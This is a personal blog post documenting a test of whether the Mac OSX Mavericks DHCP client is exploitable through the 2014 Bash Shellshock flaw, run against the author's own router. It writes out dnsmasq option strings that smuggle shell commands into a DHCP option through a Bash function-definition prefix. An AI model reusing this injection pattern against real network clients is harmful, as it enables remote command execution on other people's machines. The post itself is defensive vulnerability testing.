Home

Documenting DHCP Bash vuln test on OSX Mavericks

September 27, 2014

I tested DHCP Client on Mac OSX Mavericks to see if it is vulnerable to the Bash hole. If my test is correct, it is not. Here is my test:

First, come up with a root command that will be noticeable, and verify that it is noticeable. /usr/bin/wall is one such command, and I tested it here:

dr2chase:VM dr2chase$ sudo /usr/bin/wall /etc/syslog.conf
Password:
                                                                               
Broadcast Message from dr2chase@dr2chase.local                                 
        (/dev/ttys001) at 22:03 EDT...                                         
                                                                               
# Note that flat file logs are now configured in /etc/asl.conf                 
                                                                               
install.*						@127.0.0.1:32376                                                
                                                                               

Next, open a window to my router running Tomato and feed options to Dnsmasq, save, wait for the services to restart, then turn wifi off and on.

DnsMasqSettings

For copy-paste purposes, that string is

dhcp-option-force=114,() {ignored;}; /usr/bin/wall /etc/syslog.conf

I also tried this string to see if the bash script was running with lower privileges, yet still vulnerable:

dhcp-option-force=114,() {ignored;}; /bin/cp /etc/syslog.conf /tmp

I used these examples to get the option-setting right to Tomato, and this example to get the right option string for dnsmasq.

I verified this by setting log-dhcp and checking the logs on the router, and saw this:

Sep 27 22:25:33 janus daemon.info dnsmasq-dhcp[4580]: 1981429455 sent size: 45 option:114   28:29:20:7b:69:67:6e:6f:72:65:64:3b:7d:3b...

It should be intuitively obvious to the ASCII observer that the string was sent, spaces and all.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: